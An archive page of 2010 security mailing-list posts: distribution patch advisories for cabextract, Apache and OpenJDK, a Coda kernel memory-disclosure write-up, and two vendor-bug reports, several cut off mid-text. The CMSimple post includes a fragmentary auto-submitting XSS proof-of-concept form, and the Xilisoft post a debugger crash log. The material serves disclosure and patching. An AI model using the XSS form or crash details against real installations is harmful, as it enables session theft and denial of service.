date:20100816

[ MDVSA-2010:154 ] cabextract

2010-08-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:154
 http://www.mandriva.com/security/
 ___

 Package : cabextract
 Date: August 16, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in cabextract:
 
 The MS-ZIP decompressor in cabextract before 1.3 allows remote
 attackers to cause a denial of service (infinite loop) via a malformed
 MSZIP archive in a .cab file during a test or extract action, related
 to the libmspack library (CVE-2010-2800).
 
 Integer signedness error in the Quantum decompressor in cabextract
 before 1.3, when archive test mode is used, allows user-assisted
 remote attackers to cause a denial of service (application crash)
 or possibly execute arbitrary code via a crafted Quantum archive in
 a .cab file, related to the libmspack library (CVE-2010-2801).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages provides cabextract 1.3 which is not vulnerable
 to these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2800
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2801
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 06bc69c8c987f02d6eab9748b6b7bec6  
2008.0/i586/cabextract-1.3-0.1mdv2008.0.i586.rpm 
 2d2ce7b41e7132924160bcd4efe976bf  
2008.0/SRPMS/cabextract-1.3-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 39aa73d801d3741d73fe1c52a783c59a  
2008.0/x86_64/cabextract-1.3-0.1mdv2008.0.x86_64.rpm 
 2d2ce7b41e7132924160bcd4efe976bf  
2008.0/SRPMS/cabextract-1.3-0.1mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 a73149d41c3d97452a17ac4b9776  
2009.0/i586/cabextract-1.3-0.1mdv2009.0.i586.rpm 
 29f5eccdfafc9dbbdc0dcab535b0931f  
2009.0/SRPMS/cabextract-1.3-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 d4fcbcd75ad356e57a499a46a45078d2  
2009.0/x86_64/cabextract-1.3-0.1mdv2009.0.x86_64.rpm 
 29f5eccdfafc9dbbdc0dcab535b0931f  
2009.0/SRPMS/cabextract-1.3-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 0d36cf43befc69e5b0814d354f7d57b4  
2009.1/i586/cabextract-1.3-0.1mdv2009.1.i586.rpm 
 d424f8d01aa76eed08e148119e191cb8  
2009.1/SRPMS/cabextract-1.3-0.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 78d02c4e90a7c177f3807012c84c2144  
2009.1/x86_64/cabextract-1.3-0.1mdv2009.1.x86_64.rpm 
 d424f8d01aa76eed08e148119e191cb8  
2009.1/SRPMS/cabextract-1.3-0.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 95ded9a24a1970bb2725cc07c0934ecf  
2010.0/i586/cabextract-1.3-0.1mdv2010.0.i586.rpm 
 eaf849e2ed85315a9d29b53375bb03e4  
2010.0/SRPMS/cabextract-1.3-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 f33745fe7621d534b80a562ba103f6d2  
2010.0/x86_64/cabextract-1.3-0.1mdv2010.0.x86_64.rpm 
 eaf849e2ed85315a9d29b53375bb03e4  
2010.0/SRPMS/cabextract-1.3-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 0746bb050b807defdcfaad0fae5833ed  
2010.1/i586/cabextract-1.3-0.1mdv2010.1.i586.rpm 
 585184499c728982c8079d518f0bcb89  
2010.1/SRPMS/cabextract-1.3-0.1mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 4f4b1099fe583edd9debeef0172532ec  
2010.1/x86_64/cabextract-1.3-0.1mdv2010.1.x86_64.rpm 
 585184499c728982c8079d518f0bcb89  
2010.1/SRPMS/cabextract-1.3-0.1mdv2010.1.src.rpm

 Corporate 4.0:
 a0d9ff34690f1b1e29d018ce65b1e4a4  
corporate/4.0/i586/cabextract-1.3-0.1.20060mlcs4.i586.rpm 
 26b233403d57c89c4908873c1ca0a02a  
corporate/4.0/SRPMS/cabextract-1.3-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 f7d1e38c772dde29a902b673ae3b13b0  
corporate/4.0/x86_64/cabextract-1.3-0.1.20060mlcs4.x86_64.rpm 
 26b233403d57c89c4908873c1ca0a02a  
corporate/4.0/SRPMS/cabextract-1.3-0.1.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 7765a24842b38edb510548b0a1011acf  
mes5/i586/cabextract-1.3-0.1mdvmes5.1.i586.rpm 
 eed072c21f91ad782545f11fe901affd  
mes5/SRPMS/cabextract-1.3-0.1mdvmes5.1.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 9c1bcac99cd1575a496f9899ac881c57  
mes5/x86_64/cabextract-1.3-0.1mdvmes5.1.x86_64.rpm 
 eed072c21f91ad782545f11fe901affd  
mes5/SRPMS/cabextract-1.3-0.1mdvmes5.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-ke

CVE-2010-3014: Coda Filesystem Kernel Memory Disclosure

2010-08-16 Thread VSR Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 VSR Security Advisory
   http://www.vsecurity.com/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Coda Filesystem Kernel Memory Disclosure
 Release Date: 2010-08-16
  Application: Coda kernel module for NetBSD and FreeBSD
 Versions: All known versions
 Severity: Medium
   Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >
Vendor Status: Patch Released [2][3]
CVE Candidate: CVE-2010-3014
Reference: http://www.vsecurity.com/resources/advisory/20100816-1/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- ---
- From [1]:

 "Coda is a distributed filesystem with its origin in AFS2.  It has many
 features that are very desirable for network filesystems.  Currently, Coda has
 several features not found elsewhere.

   1. disconnected operation for mobile computing
   2. is freely available under a liberal license
   3. high performance through client side persistent caching
   4. server replication
   5. security model for authentication, encryption and access control
   6. continued operation during partial network failures in server network
   7. network bandwidth adaptation
   8. good scalability
   9. well defined semantics of sharing, even in the presence of nework failure"


Vulnerability Overview
- --
On July 19th, VSR identified a vulnerability in the Coda filesystem kernel
module, as implemented for FreeBSD and NetBSD.  By sending a specially crafted
ioctl request to a mounted Coda filesystem, an unprivileged local user could
read large portions of kernel heap memory, leading to the disclosure of
potentially sensitive information.


Product Background
- --
Coda is implemented as a kernel filesystem module with userland components.
System calls involving file I/O are passed to the Coda kernel module, which in
turn passes the request to the userland Venus cache manager via a character
device.  Venus answers the request by checking its cache or requesting content
from the Coda server.  Coda implements most standard filesystem operations,
including providing an ioctl interface. 


Vulnerability Details
- -
Coda ioctls are passed through the Coda filesystem module before being sent to
Venus.  The arguments to a Coda ioctl are encapsulated in a PioctlData struct,
which in turn contains a ViceIoctl struct.  The ViceIoctl struct contains
"in_size" and "out_size" fields, dictating the expected size of the input and
output data corresponding to a particular ioctl request.  The "in_size" field
is validated to prevent memory corruption via copying an unexpected amount of
data from userspace into a kernel buffer.  

However, the "out_size" field was missing this validation.  When copying the
output data of an ioctl request back to userspace, the "out_size" field was
used to determine the amount of data to copy, without restricting it to a
maximum possible size.  By specifying a large value for this field, the
contents of the kernel heap beyond the data intended to be returned to the user
would be copied into a userland buffer.  An unprivileged user could exploit
this to read large portions of the kernel heap, potentially disclosing
sensitive information.


Versions Affected
- -
This vulnerability affects all known versions of the Coda filesystem module as
included in FreeBSD and NetBSD.  The Linux Coda module is not affected.


Vendor Response
- ---
The following timeline details FreeBSD's and NetBSD's response to the reported
issue:

2010-07-19Vulnerability reported to FreeBSD and NetBSD
2010-07-20Fix committed by NetBSD [2]
2010-07-21Response from FreeBSD
2010-07-21FreeBSD and NetBSD provided a draft advisory
2010-08-05Fix committed by FreeBSD [3]
2010-08-16Coordinated disclosure


Recommendation
- --

Coda users should apply the updates committed by NetBSD [2] and FreeBSD[3].


Common Vulnerabilities and Exposures (CVE) Information
- --
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-3014 to this issue.  This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
- 
Thanks to the FreeBSD and NetBSD security teams for their prompt responses.

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Coda File System
 http://www.coda.cs.cmu.edu

2. Coda module in NetBSD CVS
 http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/coda/?only_with_tag=MAIN

3. FreeBSD SVN revision 210997
 http://svn.freebsd.org/viewvc/base?view=revision&revision=210997

- 
-=-=-

[USN-971-1] OpenJDK vulnerabilities

2010-08-16 Thread Kees Cook

===
Ubuntu Security Notice USN-971-1August 16, 2010
openjdk-6 vulnerabilities
CVE-2010-2548, CVE-2010-2783
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  icedtea6-plugin 6b18-1.8.1-0ubuntu1~9.04.1

Ubuntu 9.10:
  icedtea6-plugin 6b18-1.8.1-0ubuntu1~9.10.1

Ubuntu 10.04 LTS:
  icedtea6-plugin 6b18-1.8.1-0ubuntu1

After a standard system update you need to restart any Java applications
to make all the necessary changes.

Details follow:

It was discovered that the IcedTea plugin did not correctly check certain
accesses. If a user or automated system were tricked into running a
specially crafted Java applet, a remote attacker could read arbitrary
files with user privileges, leading to a loss of privacy. (CVE-2010-2548,
CVE-2010-2783)


Updated packages for Ubuntu 9.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b18-1.8.1-0ubuntu1~9.04.1.diff.gz
  Size/MD5:   130876 791d1430ba78b206019b9f928ce6f655

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b18-1.8.1-0ubuntu1~9.04.1.dsc
  Size/MD5: 2368 857c617e3aba466ebb3ede1dfb7ecadd

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b18-1.8.1.orig.tar.gz
  Size/MD5: 68315117 09ff345836841ae848e30da7ab089c87

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b18-1.8.1-0ubuntu1~9.04.1_all.deb
  Size/MD5: 19757840 8f729abfec60da0e603f96cb2cc3da75

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b18-1.8.1-0ubuntu1~9.04.1_all.deb
  Size/MD5:  5804748 8b55b8ccc2894ea6c9201d5d516c3f49

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b18-1.8.1-0ubuntu1~9.04.1_all.deb
  Size/MD5: 26750044 be4d3e01798ad02eacf9148aa97403d9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:   371434 d9f6a654460bee98a1bcebdfa514caaf

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:84162 2387e32894e2ec9f6751168521d98794

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5: 91703024 cd725d0e84441863074a630dda99f12c

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:  2360718 791d3c5321dcac6e6b905627ba88c954

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5: 11020712 e98eba6a02114d9aa57ea151b15437e3

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5: 25454558 193bc4d11a6d637af779d545e56ca612

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:   269058 065b3f5b69a853f4e02f0d466bcddd3d

http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-jre-zero_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:  2077082 777cc86837e896ab81b2319ed5ee8a16

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:   344412 5698e4578958682c58edfd30833a4f2a

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:78448 baf25cdcdf9dd797dbfe4319d5890300

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5: 156742426 3549e656235f5cafd64319d34e0e272a

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:  2342312 98ee50c02d527484482c205b0d3349a9

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5: 11036544 0cf2e6e20693daa77abc0a450a4d8bf6

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5: 27136396 8a366351c0b2edecd7f81a31d60eb4e0

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:   256316 588382d8931879923649109b21c431c6

http://security.ubuntu.com/ubuntu/pool/universe/

[ MDVSA-2010:153 ] apache

2010-08-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:153
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: August 16, 2010
 Affected: 2009.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in apache:
 
 The mod_cache and mod_dav modules in the Apache HTTP Server 2.2.x
 before 2.2.16 allow remote attackers to cause a denial of service
 (process crash) via a request that lacks a path (CVE-2010-1452).
 
 mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix,
 does not close the backend connection if a timeout occurs when reading
 a response from a persistent connection, which allows remote attackers
 to obtain a potentially sensitive response intended for a different
 client in opportunistic circumstances via a normal HTTP request.
 NOTE: this is the same issue as CVE-2010-2068, but for a different
 OS and set of affected versions (CVE-2010-2791).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2791
 http://httpd.apache.org/security/vulnerabilities_22.html
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 238de136ebd4ef12d69c2bc8a3e3d3be  
2009.0/i586/apache-base-2.2.9-12.10mdv2009.0.i586.rpm
 141124279c0755c0299d59587f0eafeb  
2009.0/i586/apache-devel-2.2.9-12.10mdv2009.0.i586.rpm
 05cf83c379680e3ed51340b42d084b54  
2009.0/i586/apache-htcacheclean-2.2.9-12.10mdv2009.0.i586.rpm
 9e1f554bb3705dedaddba825f1b56403  
2009.0/i586/apache-mod_authn_dbd-2.2.9-12.10mdv2009.0.i586.rpm
 9a3655c03604fcd04b4d1e0e34dedffc  
2009.0/i586/apache-mod_cache-2.2.9-12.10mdv2009.0.i586.rpm
 0a92ae5396ef3bc58481964474fbbb19  
2009.0/i586/apache-mod_dav-2.2.9-12.10mdv2009.0.i586.rpm
 63df221d5cf990cd347466419a8b0377  
2009.0/i586/apache-mod_dbd-2.2.9-12.10mdv2009.0.i586.rpm
 1b2dbf225749350a9bb7dcdf20b92227  
2009.0/i586/apache-mod_deflate-2.2.9-12.10mdv2009.0.i586.rpm
 5ecc8f17635dd7e7428292628daeda79  
2009.0/i586/apache-mod_disk_cache-2.2.9-12.10mdv2009.0.i586.rpm
 8fab3607fe02e1564939f8c20f0d207b  
2009.0/i586/apache-mod_file_cache-2.2.9-12.10mdv2009.0.i586.rpm
 88cd61a082b42899bda94777ab7e62aa  
2009.0/i586/apache-mod_ldap-2.2.9-12.10mdv2009.0.i586.rpm
 1ff181c8481cda668fcb129052ab094c  
2009.0/i586/apache-mod_mem_cache-2.2.9-12.10mdv2009.0.i586.rpm
 6eedc6c5d7727f408882a07d0408bbdd  
2009.0/i586/apache-mod_proxy-2.2.9-12.10mdv2009.0.i586.rpm
 ba21753018cb8fb4aa4750e8fe77e022  
2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.10mdv2009.0.i586.rpm
 2a90910cff8efc4dd4c61db469548bf5  
2009.0/i586/apache-mod_ssl-2.2.9-12.10mdv2009.0.i586.rpm
 35e3bca53a5880a07b24ad72f6dd6d07  
2009.0/i586/apache-modules-2.2.9-12.10mdv2009.0.i586.rpm
 62e5846e1811ba312d6bb8f049493788  
2009.0/i586/apache-mod_userdir-2.2.9-12.10mdv2009.0.i586.rpm
 0f15da6722a641d7d5e5b911e8c0cece  
2009.0/i586/apache-mpm-event-2.2.9-12.10mdv2009.0.i586.rpm
 9b9f2d505afcc686c7d7fd1fb80615f7  
2009.0/i586/apache-mpm-itk-2.2.9-12.10mdv2009.0.i586.rpm
 d839ec4ccd71e89115f9f62cd6ceee36  
2009.0/i586/apache-mpm-peruser-2.2.9-12.10mdv2009.0.i586.rpm
 e4ae2a88b622053fe3b319343fadaf1e  
2009.0/i586/apache-mpm-prefork-2.2.9-12.10mdv2009.0.i586.rpm
 797172063095f4f48199e0f5c6df34df  
2009.0/i586/apache-mpm-worker-2.2.9-12.10mdv2009.0.i586.rpm
 56a686181dec3713a922e2beb1b74515  
2009.0/i586/apache-source-2.2.9-12.10mdv2009.0.i586.rpm 
 ffc80b53691b9200454d986e66728aa2  
2009.0/SRPMS/apache-2.2.9-12.10mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 c578a6e9a29e81df145a388e8696e8f0  
2009.0/x86_64/apache-base-2.2.9-12.10mdv2009.0.x86_64.rpm
 168df22318ae9ea5be0f265b9aaa486a  
2009.0/x86_64/apache-devel-2.2.9-12.10mdv2009.0.x86_64.rpm
 3fd73c32becdc0c7ea67283c3a056e52  
2009.0/x86_64/apache-htcacheclean-2.2.9-12.10mdv2009.0.x86_64.rpm
 875d0e01dd140f65da24a14eb57ae484  
2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.10mdv2009.0.x86_64.rpm
 3247dcd354558d0fe035feda4416c8a0  
2009.0/x86_64/apache-mod_cache-2.2.9-12.10mdv2009.0.x86_64.rpm
 101c210907cd0e5d289081d80f83892e  
2009.0/x86_64/apache-mod_dav-2.2.9-12.10mdv2009.0.x86_64.rpm
 10b7a5d979b99bcbf38fdbe0e036a1cf  
2009.0/x86_64/apache-mod_dbd-2.2.9-12.10mdv2009.0.x86_64.rpm
 82c0a9a58e60d6018447052ad22b4507  
2009.0/x86_64/apache-mod_deflate-2.2.9-12.10mdv2009.0.x86_64.rpm
 fae88ae076de0bc2528f6b01f96c0608

[ MDVSA-2010:152 ] apache

2010-08-16 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:152
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: August 16, 2010
 Affected: 2008.0, 2009.1, 2010.0, 2010.1, Corporate 4.0
 ___

 Problem Description:

 A vulnerabilitiy has been found and corrected in apache:
 
 The mod_cache and mod_dav modules in the Apache HTTP Server 2.2.x
 before 2.2.16 allow remote attackers to cause a denial of service
 (process crash) via a request that lacks a path (CVE-2010-1452).
 
 Packages for 2008.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452
 http://httpd.apache.org/security/vulnerabilities_22.html
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 06e857488c2b40c2a0aaf7004726a502  
2008.0/i586/apache-base-2.2.6-8.6mdv2008.0.i586.rpm
 2694040802b1329f0adac51bd7640136  
2008.0/i586/apache-devel-2.2.6-8.6mdv2008.0.i586.rpm
 6c4a5fb028605baa3459e03085b37d5e  
2008.0/i586/apache-htcacheclean-2.2.6-8.6mdv2008.0.i586.rpm
 e8e0cff4447b3f7b264f660fbe379449  
2008.0/i586/apache-mod_authn_dbd-2.2.6-8.6mdv2008.0.i586.rpm
 582f3ecc2eb97e6eef6a3bdae1ff5498  
2008.0/i586/apache-mod_cache-2.2.6-8.6mdv2008.0.i586.rpm
 2a080305b7e8b11bdd97b61f79c03d6d  
2008.0/i586/apache-mod_dav-2.2.6-8.6mdv2008.0.i586.rpm
 902b29ea25196ddd0c718ba5ff8fb5bc  
2008.0/i586/apache-mod_dbd-2.2.6-8.6mdv2008.0.i586.rpm
 88820b4987fb8dbe91983a57448aefa4  
2008.0/i586/apache-mod_deflate-2.2.6-8.6mdv2008.0.i586.rpm
 caf10ec66d8a7cc0abc3e41d0862da38  
2008.0/i586/apache-mod_disk_cache-2.2.6-8.6mdv2008.0.i586.rpm
 0c99ec09dc44adcd28816e6ea1362cde  
2008.0/i586/apache-mod_file_cache-2.2.6-8.6mdv2008.0.i586.rpm
 478b82672ede1c503fc865206d21a100  
2008.0/i586/apache-mod_ldap-2.2.6-8.6mdv2008.0.i586.rpm
 fe63f0ff63ed611e682d2f7c40e017e9  
2008.0/i586/apache-mod_mem_cache-2.2.6-8.6mdv2008.0.i586.rpm
 7feee63e323c6a3b5183c42093b31e0d  
2008.0/i586/apache-mod_proxy-2.2.6-8.6mdv2008.0.i586.rpm
 a92cb47580b48464e12ce9a22d083ed3  
2008.0/i586/apache-mod_proxy_ajp-2.2.6-8.6mdv2008.0.i586.rpm
 40911443f472c5af1ab59b1fff907872  
2008.0/i586/apache-mod_ssl-2.2.6-8.6mdv2008.0.i586.rpm
 665e6157da7ecc8a553c358627014137  
2008.0/i586/apache-modules-2.2.6-8.6mdv2008.0.i586.rpm
 23842ef27bc0cb4c2928ea30c461d7bc  
2008.0/i586/apache-mod_userdir-2.2.6-8.6mdv2008.0.i586.rpm
 0736f77fe06f01e7d22b921902ed73d2  
2008.0/i586/apache-mpm-event-2.2.6-8.6mdv2008.0.i586.rpm
 ab1654f679b3f5a7032922dd9f6c8025  
2008.0/i586/apache-mpm-itk-2.2.6-8.6mdv2008.0.i586.rpm
 eb834fb78041f217d30c532bf95c0143  
2008.0/i586/apache-mpm-prefork-2.2.6-8.6mdv2008.0.i586.rpm
 add5fb58f78e7ce6689cd58c16ffdffb  
2008.0/i586/apache-mpm-worker-2.2.6-8.6mdv2008.0.i586.rpm
 2bd4caaf1128cb0fc94c4c44f2c56453  
2008.0/i586/apache-source-2.2.6-8.6mdv2008.0.i586.rpm 
 57c08b6909e494350019980e757991f5  
2008.0/SRPMS/apache-2.2.6-8.6mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 2a34fe7f0be72ccf8c9b734ca63be6e5  
2008.0/x86_64/apache-base-2.2.6-8.6mdv2008.0.x86_64.rpm
 3335fb591a6401a1b310d6bd8120660e  
2008.0/x86_64/apache-devel-2.2.6-8.6mdv2008.0.x86_64.rpm
 de353f53148a32682f8a3ffb51b76ed5  
2008.0/x86_64/apache-htcacheclean-2.2.6-8.6mdv2008.0.x86_64.rpm
 bfc150afb6ccbe9eab57849a94419e5f  
2008.0/x86_64/apache-mod_authn_dbd-2.2.6-8.6mdv2008.0.x86_64.rpm
 a0481e9c6a2bbd44247782bc90e2b915  
2008.0/x86_64/apache-mod_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
 06242bb4f8bdea11cf9ae424c5515231  
2008.0/x86_64/apache-mod_dav-2.2.6-8.6mdv2008.0.x86_64.rpm
 302f9ecc1dfb77352e296c05190afe24  
2008.0/x86_64/apache-mod_dbd-2.2.6-8.6mdv2008.0.x86_64.rpm
 2ab511c8144aa3dd8a1ad3a2feb82458  
2008.0/x86_64/apache-mod_deflate-2.2.6-8.6mdv2008.0.x86_64.rpm
 83b8eb7acd50b8a6d05b8519f7c6cb4b  
2008.0/x86_64/apache-mod_disk_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
 427b3929d5e10ffc6064ca2cc38ccd88  
2008.0/x86_64/apache-mod_file_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
 471cf9d248c1868bf9cb52e0cf544a10  
2008.0/x86_64/apache-mod_ldap-2.2.6-8.6mdv2008.0.x86_64.rpm
 f32c311f6fd086c49cebfcd61b685fce  
2008.0/x86_64/apache-mod_mem_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
 d4f5e603a512172fb1079942eaa9c076  
2008.0/x86_64/apache-mod_proxy-2.2.6-8.6mdv2008.0.x86_64.rpm
 581b37d6fa9de183f81676686693e689  
2008.0/x86_64/apache-mod_proxy_ajp-2.2.6-8.6mdv2008.0.x86_64.rpm
 5e866de5a08f901f76ea0f37f6502624  
2008.0/x86_64/apache-mod_ssl-2.2.6-8.6mdv2008.0.x86_64.rpm
 9bae7e180f5aa6310a7c324f

XSS vulnerability in CMSimple

2010-08-16 Thread advisory

Vulnerability ID: HTB22558
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cmsimple.html
Product: CMSimple
Vendor: Peter Andreas Harteg ( http://www.cmsimple.org/ ) 
Vulnerable Version: 3.3 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/cmsimple/adm.php" script to 
properly sanitize user-supplied input in "site_title" variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

http://host/"; method="post"  name="main" >

































document.main.submit();

Xilisoft Video Converter Wizard 3 ogg file processing DoS

2010-08-16 Thread praveen_recker

ModLoad: 5b86 5b8b4000   C:\WINDOWS\system32\NETAPI32.dll

ModLoad: 769c 76a73000   C:\WINDOWS\system32\USERENV.dll

(26c8.1818): Access violation - code c005 (!!! second chance !!!)

eax= ebx=019dc690 ecx= edx= esi=0199ffb0 edi=0199fe20

eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video 
Converter 3\avformat.dll

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\Program Files\Xilisoft\Video Converter 3\avformat.dll - 

avformat!yuv4mpeg_init+0x6e06:

0036a9ba 8a6811  mov ch,byte ptr [eax+11h]  ds:0023:0011=??

Missing image name, possible paged-out or corrupt data.

Missing image name, possible paged-out or corrupt data.

Missing image name, possible paged-out or corrupt data.

0:000> g

(26c8.1818): Access violation - code c005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax= ebx=019dc690 ecx= edx= esi=0199ffb0 edi=0199fe20

eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010246

avformat!yuv4mpeg_init+0x6e06:

0036a9ba 8a6811  mov ch,byte ptr [eax+11h]  ds:0023:0011=??

0:000> kv

ChildEBP RetAddr  Args to Child  

WARNING: Stack unwind information not available. Following frames may be wrong.

0012d860 003540ea 0012d8a0 0199ffb0 0012d8a0 avformat!yuv4mpeg_init+0x6e06

     avformat!nut_init+0x42a



0:000> d eip

0036a9ba  8a 68 11 8a 50 0f 8a 48-10 c1 e1 08 0b ca 33 d2  .h..P..H..3.

0036a9ca  8a 50 0e c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90  .P..

